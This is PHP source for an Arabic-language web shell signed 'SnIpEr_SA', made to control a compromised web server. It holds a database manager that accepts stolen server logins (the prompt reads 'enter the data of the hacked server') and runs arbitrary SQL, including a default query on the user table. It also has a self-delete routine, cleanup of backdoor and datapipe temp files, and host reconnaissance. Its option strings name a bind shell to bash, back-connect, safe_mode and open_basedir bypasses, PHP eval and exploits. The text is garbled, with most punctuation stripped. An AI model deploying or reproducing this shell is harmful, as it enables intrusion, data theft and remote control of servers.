$tablename Values( ; for ($x =0; $x $flds; $x++){ Multiple Select values for SET if(is_array($array[$x])){ $mval=; for($m=0; $m count($array[$x]); $m++){ if($m+1 == count($array[$x])){ $mval.= AddSlashes($array[$x][$m]); }else{ $mval.= AddSlashes($array[$x][$m]).,; } $fval = $mval; } }else{ $fval = AddSlashes($array[$x]); } $qry .= '$fval'; if ($x $flds-1){ $qry.= , ; } } $query .= $qry.); echoqry $qry; $result=exequery($query, $tablename, $dbname); if($result){ return $result; }else{ return false; }}ADD Form function addform($tablename, $dbname){ Display the field names and input boxes echoform action='$action' method='post'n; echotable border=0 width='100%' align='center'n; echotr class=headtdField NametdtdTypetdtdValuetdtrn; $result=exequery(Select from $tablename, $tablename, $dbname); $result = @mysql_query( Select from $tablename ); $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); echoinput type=hidden name=tablename value='$tablename' n; echoinput type=hidden name='dbname' value='$dbname' n; echotrn; $mxlen = 80;max width of the form fields. for($i=0; $i $flds; $i++){ $auto = false; echo th.mysql_field_name($fields, $i); $fieldname = mysql_field_name($fields, $i); added $type = mysql_field_type($result, $i); $flen = mysql_field_len($result, $i);length of the field $flagstring = mysql_field_flags ($result, $i); Start of new code for set drop down $newsql = show columns from $tablename like '%.$fieldname.'; $newresult = exequery($newsql, $tablename, $dbname); mysql_query($newsql) or die ('I cannot get the query because ' . mysql_error()); $arr=mysql_fetch_array($newresult); End of new code block for set drop down if (eregi(primary,$flagstring )){ $type .= PK ; } if(eregi(auto,$flagstring )){ $type .= auto_increment; $auto = true; } if ($auto==true){ echotd$typetdtdinput type=text name='array[$i]' size='$flen' value=0 tdtrn; }elseif($flen $mxlen){ $rws= $flen$mxlen; if($rws10){ $rws=10; max length of textarea } echotd$typetdtdtextarea name='array[$i]' rows=$rws cols=$mxlentextareatdtrn; Start of new code for set drop down }elseif (strncmp($arr[1],'set',3)==0 strncmp($arr[1],'enum',4)==0){ We have a field type of set or enum $num=substr_count($arr[1],',') + 1; count the number of entries $pos=strpos($arr[1],'(' ); find the position of '(' $newstring=substr($arr[1],$pos+1); get rid of the '(' $snewstring=str_replace(')','',$newstring); get rid of the last ')' $nnewstring=explode(',',$snewstring,$num); stick into an array if(strncmp($arr[1],'set',3)==0 ){Sets can have combinations of values echo tdSet (select one or more)td; echotdselect name='array[$i][]' size='3' multiple; }else{Enum one value only echo tdEnumtd; echotdselect name='array[$i]'; } for($y=0; $y$num;$y++){ echooption value=$nnewstring[$y]$nnewstring[$y]; } echoselecttdtrn; End of new code block for set drop down }else{ echotd$typetdtdinput type=text name='array[$i]' size='$flen' tdtrn; } } echotrtdinput class=but type=submit name='addrec' value='Add Record' tdn; echotdinput class=but type=reset name='reset' value='Reset Form' tdn; echotr; echotablen; echoformn;}Edit Form function editform($tablename, $dbname, $result, $edit, $pk, $pv){ $row=mysql_fetch_array($result); echoform action='$action' method=postn; echotable border=0 width ='100%' align='center'n; $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); echoinput type=hidden name=tablename value='$tablename' n; echoinput type=hidden name='dbname' value='$dbname' n; echotr; $mxlen = 80;max width of the form fields for($i=0; $i $flds; $i++){ $fname=mysql_field_name($fields, $i); echo th$fname; $flen = mysql_field_len($result, $i);length of the field $nslash = StripSlashes($row[$i]); Start of new code for set drop down $newsql = show columns from $tablename like '%.$fname.'; $newresult = exequery($newsql, $tablename, $dbname); $arr=mysql_fetch_array($newresult); End of new code block for set drop down if($flen $mxlen){ $rws= $flen$mxlen; if($rws10){ $rws=10; max length of textarea } echotdtextarea name='array[$i]' rows=$rws cols=$mxlen$nslashtextareatdtrn; Start of new code for set drop down }elseif (strncmp($arr[1],'set',3)==0 strncmp($arr[1],'enum',4)==0){ We have a field type of set or enum $num=substr_count($arr[1],',') + 1; count the number of entries $pos=strpos($arr[1],'(' ); find the position of '(' $newstring=substr($arr[1],$pos+1); get rid of the '(' $snewstring=str_replace(')','',$newstring); get rid of the last ')' $nnewstring=explode(',',$snewstring,$num); stick into an array if(strncmp($arr[1],'set',3)==0 ){Sets can have combinations of values echotdselect name='array[$i][]' multiple size='3'; }else{Enum one value only echotdselect name='array[$i]'; } $nsel=explode(,,$nslash); for($y=0; $y$num;$y++){ geteach value 'a,b,c' $sel=; for($e=0; $ecount($nsel);$e++){ if($nnewstring[$y]=='.$nsel[$e].'){ $sel=selected; } } echooption value=$nnewstring[$y] $sel$nnewstring[$y]; } echoselecttdtrn; End of new code block for set drop down }else{ echotdinput type=text name='array[$i]' size='$flen' value='$nslash' tdtrn; } for($f =0; $f count($pk);$f++){ echoinput type=hidden name=pk[$f] value='$pk[$f]' ; echoinput type=hidden name=pv[$f] value='$pv[$f]' n; } } echotrtdinput class=but type=submit name='editrec' value='Update' tdn; echotdinput class=but type=reset name='reset' value='Reset Form' tdn; echotr; echotablen; echoformn;}Edit Recordfunction editrec($dbname, $tablename, $pk, $pv, $array){ $result = @mysql_query( Select from $tablename ); $result = exequery(Select from $tablename, $tablename, $dbname); $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename);Build Query $qry=; $query = UPDATE $tablename set ; for ($x =0; $x $flds; $x++){ $fie = mysql_field_name($fields, $x ); SET and ENUM if(is_array($array[$x])){ $mval=; for($m=0; $m count($array[$x]); $m++){ if($m+1 == count($array[$x])){ $mval.= AddSlashes($array[$x][$m]); }else{ $mval.= AddSlashes($array[$x][$m]).,; } $fval = $mval; } }else{ $fval = AddSlashes($array[$x]); } $fval = AddSlashes($array[$x]); $qry .= $fie = '$fval'; if ($x $flds-1){ $qry.= , ; } } $whr = buildwhr( $pk, $pv); $whr =StripSlashes($whr); $query .= $qry; $query .= where $whr; $result=exequery($query, $tablename, $dbname); if($result){ return $result; }else{ return false; }} Number of Primary Keys function numpk($result){ $z =0; for ($i = 0; $i $flds; $i++) { Find the primary key $flagstring = mysql_field_flags ($result, $i); if(eregi(primary,$flagstring )){ $z++; } } return $z;}Size fieldfunction fieldformsize($ft, $i, $l){ $ft= trim(strtoupper($ft)); if($ft ==DATE $ft==TIME $ft== DATETIME ){ }elseif( $ft==TINYTEXT $ft==BLOB $ft==TEXT $ft ==MEDIUMBLOB){ echoinput type=hidden name='leng[$i]' value=$l; }elseif($ft==MEDIUMTEXT $ft==LONGBLOB $ft==LONGTEXT $ft==TINYBLOB){ echoinput type=hidden name='leng[$i]' value=$l; }elseif($ft==INT $ft==TINYINT $ft==SMALLINT $ft==MEDIUMINT $ft==BIGINT $ft==INTEGER){ echoinput type=text name='leng[$i]' size=5 value=$l; }elseif($ft==YEAR ){ echoselect name='leng[$i]'; echooption value='4'4; echooption value='2'2; echoselectn; }elseif($ft==SET $ft==ENUM){ echoinput type=text name='leng[$i]' title='values eg a, b, c' value='' ; }else{ echoinput type=text name='leng[$i]' size=5 value=$l n; }}Display Row function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){ $pkfs=; $hv=; $hf=; if($cpk 0 && !empty($pkfield)){ for($a = 0; $a $cpk; $a++){ $fieldn = $pkfield[$a]; $hf .= input type=hidden name=pk[$a] value='$pkfield[$a]' ; $hv .= input type=hidden name=pv[$a] value='$row[$fieldn]' ; } }else{ No Primary Key so use all fields $fields = mysql_list_fields($dbname, $tbl); for($b = 0; $b $flds; $b++){ $fie = mysql_field_name($fields, $b ); $hf .= input type=hidden name=pk[$b] value='$fie' ; $hv .= input type=hidden name=pv[$b] value='$row[$b]' ; } } echotrn; edit Record echotdform action='$action' method=postn; echoinput type=hidden name=dbname value='$dbname' n; echoinput type=hidden name=tablename value='$tbl' n; echoinput type=hidden name=npkeys value='$cpk' n; echo$hf; echo$hv; echoinput class=sml type=submit name=edit value='Edit Record' n; echoformtdn; Delete record echotdform action='$action' method=postn; echoinput type=hidden name=dbname value='$dbname' n; echoinput type=hidden name=tablename value='$tbl' n; echoinput type=hidden name=num value='$cpk' n; echo$hf; echo$hv; echoinput class=smldel type=submit name=delete value='Delete Record' n; echoformtd; Display all the columns. for($col = 0; $col $flds; $col ++){ $nslash = StripSlashes($row[$col]); echotd$nslashtd; } echotr;}Remove Array Copyremoves copies from an array $x.function removearraycopy($x){ $leng= count($x); sort($x); $farr=array(); for ($i =0; $i $leng; $i++){ $flag=false; for ($s =0; $s count($farr); $s++){ if($x[$i]==$farr[$s]){ $flag=true; } } if ($flag == false){ $farr[count($farr)] = $x[$i]; } } return $farr;} page position function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){ $pgs = $num_rows$pagemax; $pgs=ceil($pgs); round up the number of pages. echoform action='$action' id='recspage' method='post' name='recspage'n; echoTotal number of records $num_rows, displayed on $pgs pages of n; echoinput type='text' name='pagemax' value='$pagemax' size='4' onchange='javascriptthis.form.submit();' title='Type the number records to display on a page then click outside the box' n; echoinput type='hidden' name='searchval' value='$searchval' n; echoinput type='hidden' name='tablename' value='$tablename' n; echorecords per page.form n; $pagescrol=; $sval=; if($pgs 1){ $pagescrol=div class='pagecount'n; $nxt=$pg+1; $bk=$pg-1; $lst=$pgs; $end=$lst-1; $showp=$pg+1; if($searchval !=){ $sval=&searchval=$searchval; } $pagescrol .= form name='pages' id='pages' action='$action' method='get'n; if($pg=1){ $pagescrol .= a href='$actiontablename=$tablename&pg=0$sval' title='To first page' 1 a n; $pagescrol .= a href=''action'tablename=$tablename&pg=$bk$sval' title='Back one page' a n; } $pagescrol .= input type='text' name='pg' value='$showp' size='4' onchange='javascriptthis.form.submit();' title='Type a page number then click outside the box' n; $pagescrol .= input type='hidden' name='pback' value='true' n; $pagescrol .= input type='hidden' name='searchval' value='$searchval' n; $pagescrol .= input type='hidden' name='tablename' value='$tablename' n; if($showp $lst){ $pagescrol .= a href=''action'tablename=$tablename&pg=$nxt$sval' title='Next page' a n; $pagescrol .= a href=''action'tablename=$tablename&pg=$end$sval' title='To Last page' $lsta n; } $pagescrol .= formn; $pagescrol.=divn; } return $pagescrol;}Display FooterPlease don't remove or change.function display_foot(){ echodiv class='foot'Version $version © .date('Y'). a style='text-decorationnone;' target='_blank' href='httpwww.SnIpEr-SA.com'SnIpEr_SAadiv; }My SizeReturns the size of a table or databasefunction mysize($dbname, $tablename){ $like=; $total=; $t=0; if($tablename !=){ $like= like '$tablename'; } $sql= SHOW TABLE STATUS FROM $dbname $like; $result = mysql_query($sql); $result=exequery($sql, $tablename, $dbname); if($result){ while($rec = mysql_fetch_array($result)){ $t+=($rec['Data_length'] + $rec['Index_length']); } $total =span class='bytes'$t bytesspan; }else{ $total=Unknowen; } return($total);}DEBUG to show all being passed to the pagefunction showpassingvars(){ echoGet ; foreach($_GET as $pram=$value){ echo$pram $value, ; } echobrPost ; foreach($_POST as $pram=$value){ echo$pram $value, ; } echobrSession ; foreach($_SESSION as $pram=$value){ echo$pram $value, ; } }echohtmln;echometa http-equiv='Content-Type' content='texthtml; charset=windows-1256'n;echoheadn;echotitleسكربت الاتصال بقواعد البياناتtitlen;echoSTYLEBODY { SCROLLBAR-FACE-COLOR #000000; SCROLLBAR-HIGHLIGHT-COLOR #000000; SCROLLBAR-SHADOW-COLOR #000000; COLOR #ffffff; SCROLLBAR-3DLIGHT-COLOR #726456; SCROLLBAR-ARROW-COLOR #726456; SCROLLBAR-TRACK-COLOR #292929; FONT-FAMILY Verdana; SCROLLBAR-DARKSHADOW-COLOR #726456}tr {BORDER-RIGHT #cccccc ;BORDER-TOP #cccccc ;BORDER-LEFT #cccccc ;BORDER-BOTTOM #cccccc ;color #ffffff;}td {BORDER-RIGHT #cccccc ;BORDER-TOP #cccccc ;BORDER-LEFT #cccccc ;BORDER-BOTTOM #cccccc ;color #cccccc;}.table1 {BORDER 1;BACKGROUND-COLOR #000000;color #333333;}.td1 {BORDER 1;font 7pt tahoma;color #ffffff;}.tr1 {BORDER 1;color #cccccc;}table {BORDER #eeeeee outset;BACKGROUND-COLOR #000000;color #cccccc;}input {BORDER-RIGHT #990000 1 solid;BORDER-TOP #990000 1 solid;BORDER-LEFT #990000 1 solid;BORDER-BOTTOM #990000 1 solid;BACKGROUND-COLOR #333333;font 9pt tahoma;color #ffffff;}select {BORDER-RIGHT #ffffff 1 solid;BORDER-TOP #999999 1 solid;BORDER-LEFT #999999 1 solid;BORDER-BOTTOM #ffffff 1 solid;BACKGROUND-COLOR #000000;font 9pt tahoma;color #CCCCCC;;}submit {BORDER buttonhighlight 1 outset;BACKGROUND-COLOR #272727;width 40%;color #cccccc;}textarea {BORDER-RIGHT #ffffff 1 solid;BORDER-TOP #999999 1 solid;BORDER-LEFT #999999 1 solid;BORDER-BOTTOM #ffffff 1 solid;BACKGROUND-COLOR #333333;font Fixedsys bold;color #ffffff;}BODY {margin 1;color #cccccc;background-color #000000;}Alink {COLORred; TEXT-DECORATION none}Avisited { COLORred; TEXT-DECORATION none}Aactive {COLORred; TEXT-DECORATION none}Ahover {colorblue;TEXT-DECORATION none}STYLEn;echometa http-equiv='Content-Type' content='texthtml charset=windows-1256';echotitleسكربت الاتصال بقواعد البياناتtitlen;echometa name='author' content='Tony Aslett';echometa name='title' content='PHPMySQL Table Manager';echometa name='description' content='Table Manager for MySQL Database';echolink rel='stylesheet' href='tmgrstyles.css' type='textcss'n;echoheadn;echobodyn;$showall=true;echoh2 class=h سكربت الاتصال بقواعد البياناتh2n; Session Logon if(isset($_POST['logout'])){ $_POST['dbname']=; session_unset(); session_destroy();}if(isset($_POST['userid']) && isset($_POST['pword1'])){ $_SESSION['user'] = $_POST['userid']; $_SESSION['password'] = $_POST['pword1'];}if (!isset($_SESSION['user']) !isset($_SESSION['password'])){ echodiv align=center; echoh2ادخل بيانات السيرفر المخترقh2n; If(!isset($dbnamearray)){ $dbnamearray=; } show_login($dbnamearray); echodiv;}else{ show logout option. echodiv align=right; endsess(); echodiv;}dbnameif(isset($_POST['dbname'])){ $dbname=$_POST['dbname']; $_SESSION['dbname']= $_POST['dbname'];} Hostif(isset($_POST['host'])){ $host=$_POST['host']; $_SESSION['host']=$_POST['host'];}set tablenameif(isset($_GET['tablename']) ){ $tablename=$_GET['tablename'];}elseif(isset($_POST['tablename'])){ $tablename=$_POST['tablename'];} pagemaxif(isset($_POST['pagemax'])){ && is_int($_POST['pagemax'])){ $isnum=true; for($o=0; $ocount($_POST['pagemax']); $o++){ if($_POST['pagemax'][$o]9){ $isnum=false; } } if($_POST['pagemax']0 && $isnum){ $_SESSION['pagemax']=$_POST['pagemax']; }} if(isset($_SESSION['pagemax'])){ $pagemax=$_SESSION['pagemax']; } create a new Database if(isset($_POST['cndb'])){ connectmysql(); $sql=create database $_POST[ndbname]; $result=exequery($sql, , $_POST['ndbname']); if ($result){ $_SESSION['dbname'] = $_POST['ndbname']; $sql=Use $_POST[ndbname]; $result=exequery($sql, , $_POST['ndbname']); if($result){ echoh2قاعدة جديدة $_SESSION[dbname] h2n; } }}if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ post Databse names showdb();} Choose DB if(isset($_POST['dbname']) && $_POST['dbname']==){ showdb();}if (isset($_SESSION['dbname']) isset($_POST['dbna']) isset($_POST['dbname'])){ connection if (isset($_SESSION['dbname'])){ $dbsetname = $_SESSION['dbname']; }elseif(isset($_POST['dbname'])){ $dbsetname = $_POST['dbname']; $_SESSION['dbname'] = $_POST['dbname']; }else{ $dbsetname = $_POST['dbna']; $_SESSION['dbname'] = $_POST['dbna']; }} we have a DB setif(isset($dbsetname) && $dbsetname!=){ $link= connectmysql(); echoDBS $dbsetname; $conn = connectdb($dbsetname, $link); Drop Table if(isset($_POST['deltable'])){ $showall=false; $tablename=$_POST['tablename']; echoh1!!! تحذير !!! brانت تحاول مسح هذا الجدول $tablenamebr; echoهل انت متاكد من القيام بالعمليه؟h1n; $va=Drop $tablename; goto($tablename, $dbname,$action, 'del', 'droptab', $va ); } if(isset($_POST['droptab'])){ $tablename=$_POST['tablename']; $dsql = drop table $tablename; $result=exequery($dsql, $tablename, $dbname); unset($tablename); =false; unset($_POST['tablename']); }Write Your Own Query if(isset($_POST['wyoq'])){ post $value=الواجهه الرئيسيه للسكربت; goto($tablename, $dbname, $action, 'but', 'start', $value ); echoform method='post'n; echoinput type='hidden' name='dbname' value=$dbnamen; echoinput type=text name='wyqota' width='500px' style='overflow-xvisible;'n; echotextarea name='wyoqta' cols='60' rows='5' style='overflow-yvisible'textarean; echobrinput class=but type=submit name='runquery' value='Execute Query'n; echoformbrn; } if(isset($_POST['runquery'])){ $wyoqta = StripSlashes($_POST['wyoqta']); $result=exequery($wyoqta, , ); if(@mysql_num_rows($result) 0){ $numrows=mysql_num_rows($result); $flds=mysql_num_fields($result); echotable; for($r=0; $r $numrows; $r++){ echotr; $row=mysql_fetch_array($result); for($col = 0; $col $flds; $col ++){ $nslash = StripSlashes($row[$col]); echotd$nslashtd; } echotr; } echotable; }elseif (mysql_affected_rows()){ echo Number of Rows affected .mysql_affected_rows(); }else{ echo Nothing returned from the query.; } } List Tables if( ! isset($tablename) $tablename== ){ $dbname=$_SESSION['dbname']; $result = mysql_list_tables($_SESSION['dbname']); $numtab = mysql_num_rows ($result); if($numtab == 1){ $_SESSION['tablename'] =mysql_tablename($result, 0); } Buttons if (isset($_POST['runquery'])){ $dbname=$_SESSION['dbname']; $value=$dbname Start; Table Manager Start goto(, $_SESSION['dbname'], $action, 'but', 'tablestart', $value ); }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ write your own query. echotable width=40% border=0 align='left' n; echotrtd; $va=إنشاء جدول جديد; goto(, $_SESSION['dbname'], create.php, 'but', 'create', $va ); echoa href=create.php class='crt'Create new Tablean; echotdtd; $value=الواجهه الرئيسيه; Choose DB goto(, , $action, 'but', 'db', $value ); echotdn; $value=Write Your Own Query; goto( , $_SESSION['dbname'], $action, 'but', 'wyoq', $value ); echotdtr; echotablebrbrbrbrdiv style='clearboth;'div; echotable width=100% border=0 align='center' n; for ($i =0; $i $numtab; $i++) { $tb_names[$i] = mysql_tablename($result, $i); echotr class='frow'td align='center'n; $va=عرض جدول $tb_names[$i]; goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va ); echotdtd align='center' valign='middle'n; $va=مسح جدول $tb_names[$i]; goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va ); echotdtd align='center' valign='middle'n; $va=Alter Table $tb_names[$i]; goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va ); echotdtd align='center' valign='middle'n; searchtableform($tb_names[$i], $_SESSION['dbname']); echotdtd; Table size in bytes echo mysize($_SESSION['dbname'],$tb_names[$i]); echotdtrn; }for echotablen; } }else{ tablename is set menu echotabletr class='frow'tdn; $value=$_SESSION[dbname] Start; Ex Table Manager Start goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value ); echotdn; echotdn; $value=الواجهه الرئيسيه; Choose DB goto(, , $action, 'but', 'start', $value ); echotdn; echotdn; $value=Write Your Own Query; goto( , $_SESSION['dbname'], $action, 'but', 'wyoq', $value ); echotdn; if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){ echotd; $tablename = $_POST['tablename']; $va=Add a $tablename Record; goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va ); echotdn; } if (!isset($_POST['deltable'])){ echotdn; searchtableform($tablename, $_SESSION['dbname']); echotdn; } echotrtablen; echobr n; if(isset($_POST['addrec'])){ $showall=false; $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']); }elseif(isset($_POST['add'])){ $showall=false; addform($tablename, $_SESSION['dbname']); }elseif(isset($_POST['delete'])){ delete record has been pushed $showall=false; $whr=buildwhr($_POST['pk'], $_POST['pv']); $sql = delete from $tablename where $whr; $result=exequery($sql, $tablename, $_SESSION['dbname']); }elseif (isset($_POST['edit'])){Edit $showall=false; $whr = buildwhr( $_POST['pk'], $_POST['pv']); $tablename = $_SESSION['tablename']; $sql= Select from $tablename where $whr; $result=exequery($sql, $tablename, $_SESSION['dbname']); editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']); }elseif(isset($_POST['editrec'])){ $showall=false; $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']); } Search if(isset($_POST['searchval'])){ $searchval=$_POST['searchval']; }elseif(isset($_GET['searchval'])){ $searchval=$_GET['searchval']; }else{ $searchval=; } if (isset($_GET['tablename'])){ $tablename = $_GET['tablename']; } if((isset($_POST['search']) isset($searchval)) && $searchval !=){ $result=searcht($tablename, $_SESSION['dbname'], $searchval); }else{ Display All $query = select from $tablename; $result=exequery($query, $tablename, $_SESSION['dbname']); } Display record count if($showall){ $num_rows = mysql_num_rows($result); Workout whick page to display if(!isset($_GET['pg']) && !isset($pg)){ $beg=0; $pg=0; }else{ if(isset($_GET['pback'])){ $pg=$_GET['pg']; }else{ $pg=$_GET['pg']; } if($pg 0 ){ $pg=0; } if($pg $num_rows$pagemax){ $pg=ceil($num_rows$pagemax)-1; } $beg = $pg $pagemax; } if (!isset($_POST['add'])){ $pscrol= ; $pagescrol = ; $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval); echo $pagescroln; Display next Top page menu $flds = mysql_num_fields($result); echotable border=0 width='100%'n; echotr class=headtdtdtdtdn; $fields = mysql_list_fields( $_SESSION['dbname'], $tablename); $z=0; $x =0; $pkfield=array();Display each of the field names. for ($i = 0; $i $flds; $i++) { echo td.mysql_field_name($fields, $i).tdn; Find the primary key $flagstring = mysql_field_flags ($result, $i); if(eregi(primary,$flagstring )){ $pk[$z] = $i; $pkfield[$z]= mysql_field_name($fields, $i); $z++; } } echotrn; $tbl=$tablename; if(isset($pk)){ if($z 0){ $cpk=count($pk); }else{ $cpk=0; }Display each row from the table. for ($s=$beg; $s $beg + $pagemax; $s++){ if($s $num_rows){ if (!mysql_data_seek ($result, $s)) { echo Cannot seek to row $sn; continue; } $row=mysql_fetch_array($result); if(!isset($pk)){ $pk= ; $pkfield= array(); } displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds); } } } echotablen; if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){ echobr; echo $pagescroln; Display bottom next page menu } echobrbrn; }showall if(isset($_POST['tablename'])){ echotable border=0; echotrtd; $tablename=$_POST['tablename']; $va=Alter Table $tablename; goto( $tablename, $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va ); echotdtrn; echotablen; } }}display_foot();echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv; die(); }if (!empty($_POST['cmd']) && $_POST['cmd']==db_query) { echo $head; $sql = new my_sql(); $sql-db = $_POST['db']; $sql-host = $_POST['db_server']; $sql-port = $_POST['db_port']; $sql-user = $_POST['mysql_l']; $sql-pass = $_POST['mysql_p']; $sql-base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo 'body bgcolor=#000000'; if(!$sql-connect()) echo div align=centerfont face=tahoma size=-2 color=redbCan't connect to SQL serverbfontdiv; else { if(!empty($sql-base)&&!$sql-select_db()) echo div align=centerfont face=tahoma size=-2 color=redbلم يستطيع تحديد قاعده البياناتbfontdiv; else { foreach($querys as $num=$query) { if(strlen($query)5) { echo font face=tahoma size=-2 color=greenbQuery#.$num. .htmlspecialchars($query,ENT_QUOTES).bfontbr; switch($sql-query($query)) { case '0' echo table width=100%trtdfont face=tahoma size=-2Error b.$sql-error.bfonttdtrtable; break; case '1' if($sql-get_result()) { echo table width=100%; foreach($sql-columns as $k=$v) $sql-columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode( bfonttdtd bgcolor=#ccccccfont face=tahoma size=-2b , $sql-columns); echo trtd bgcolor=#333333font face=tahoma size=-2b .$keys. bfonttdtr; for($i=0;$i$sql-num_rows;$i++) { foreach($sql-rows[$i] as $k=$v) $sql-rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode( fonttdtdfont face=tahoma size=-2 ,$sql-rows[$i]); echo 'trtdfont face=tahoma size=-2 '.$values.' fonttdtr'; } echo table; } break; case '2' $ar = $sql-affected_rows()($sql-affected_rows())('0'); echo table width=100%trtdfont face=tahoma size=-2affected rows b.$ar.bfonttdtrtablebr; break; } } } } } echo brform name=form method=POST; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo div align=center; echo font face=tahoma size=-2bBase binput type=text name=mysql_db value=.$sql-base.fontbr; echo textarea cols=65 rows=10 name=db_query.(!empty($_POST['db_query'])($_POST['db_query'])(SHOW DATABASES;nSELECT FROM user;)).textareabrinput type=submit name=submit value= Run SQL query divbrbr; echo form; echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv; die(); }if(isset($_GET['delete'])) { @unlink(__FILE__); }if(isset($_GET['tmp'])) { @unlink(tmpbdpl); @unlink(tmpback); @unlink(tmpbd); @unlink(tmpbd.c); @unlink(tmpdp); @unlink(tmpdpc); @unlink(tmpdpc.c); }if(isset($_GET['phpini'])){echo $head;function U_value($value) { if ($value == '') return 'ino valuei'; if (@is_bool($value)) return $value 'TRUE' 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); }function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, 'wbr ', true); return @preg_replace('!(&[^;])wbr ([^;];)!', '$1$2wbr ', $str); }if (@function_exists('ini_get_all')) { $r = ''; echo 'table width=100%', 'trtd bgcolor=#000000font face=tahoma size=-2 color=reddiv align=centerbDirectivebdivfonttdtd bgcolor=#000000font face=tahoma size=-2 color=reddiv align=centerbLocal Valuebdivfonttdtd bgcolor=#000000font face=tahoma size=-2 color=reddiv align=centerbMaster Valuebdivfonttdtr'; foreach (@ini_get_all() as $key=$value) { $r .= 'trtd'.ws(3).'font face=tahoma size=-2b'.$key.'bfonttdtdfont face=tahoma size=-2div align=centerb'.U_value($value['local_value']).'bdivfonttdtdfont face=tahoma size=-2div align=centerb'.U_value($value['global_value']).'bdivfonttdtr'; } echo $r; echo 'table'; }echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv;die();}if(isset($_GET['cpu'])) { echo $head; echo 'table width=100%trtd bgcolor=#000000div align=centerfont face=tahoma size=-2 color=redbCPUbfontdivtdtrtabletable width=100%'; $cpuf = @file(cpuinfo); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i$c;$i++) { $info = @explode(,$cpuf[$i]); if($info[1]==){ $info[1]=---; } $r .= 'trtd'.ws(3).'font face=tahoma size=-2b'.trim($info[0]).'bfonttdtdfont face=tahoma size=-2div align=centerb'.trim($info[1]).'bdivfonttdtr'; } echo $r; } else { echo 'trtd'.ws(3).'div align=centerfont face=tahoma size=-2b --- bfontdivtdtr'; } echo 'table'; echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv; die(); }if(isset($_GET['mem'])) { echo $head; echo 'table width=100%trtd bgcolor=#000000div align=centerfont face=tahoma size=-2 color=redbMEMORYbfontdivtdtrtabletable width=100%'; $memf = @file(meminfo); if($memf) { $c = sizeof($memf); for($i=0;$i$c;$i++) { $info = explode(,$memf[$i]); if($info[1]==){ $info[1]=---; } $r .= 'trtd'.ws(3).'font face=tahoma size=-2b'.trim($info[0]).'bfonttdtdfont face=tahoma size=-2div align=centerb'.trim($info[1]).'bdivfonttdtr'; } echo $r; } else { echo 'trtd'.ws(3).'div align=centerfont face=tahoma size=-2b --- bfontdivtdtr'; } echo 'table'; echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv; die(); }$lang=array('eng_text1' ='Executed command','eng_text2' ='Execute command on server','eng_text3' ='Run command','eng_text4' ='Work directory','eng_text5' ='Upload files on server','eng_text6' ='Local file','eng_text7' ='Aliases','eng_text8' ='Select alias','eng_butt1' ='Execute','eng_butt2' ='Upload','eng_text9' ='Bind port to binbash','eng_text10'='Port','eng_text11'='Password for access','eng_butt3' ='Bind','eng_text12'='back-connect','eng_text13'='IP','eng_text14'='Port','eng_butt4' ='Connect','eng_text15'='Upload files from remote server','eng_text16'='With','eng_text17'='Remote file','eng_text18'='Local file','eng_text19'='Exploits','eng_text20'='Use','eng_text21'=' New name','eng_text22'='datapipe','eng_text23'='Local port','eng_text24'='Remote host','eng_text25'='Remote port','eng_text26'='Use','eng_butt5' ='Run','eng_text28'='Work in safe_mode','eng_text29'='ACCESS DENIED','eng_butt6' ='Change','eng_text30'='Cat file','eng_butt7' ='Show','eng_text31'='File not found','eng_text32'='Eval PHP code','eng_text33'='Test bypass open_basedir with cURL functions','eng_butt8' ='Test','eng_text34'='Test bypass safe_mode with include function','eng_text35'='Test bypass safe_mode with load file in mysql','eng_text36'='Database . Table','eng_text37'='Login','eng_text38'='Password','eng_text39'='Database','eng_text40'='Dump database table','eng_butt9' ='Dump','eng_text41'='Save dump in file','eng_text42'='Edit files','eng_text43'='File for edit','eng_butt10'='Save','eng_text44'='Can't edit file! Only read access!','eng_text45'='File saved','eng_text46'='Show phpinfo()','eng_text47'='Show variables from php.ini','eng_text48'='Delete 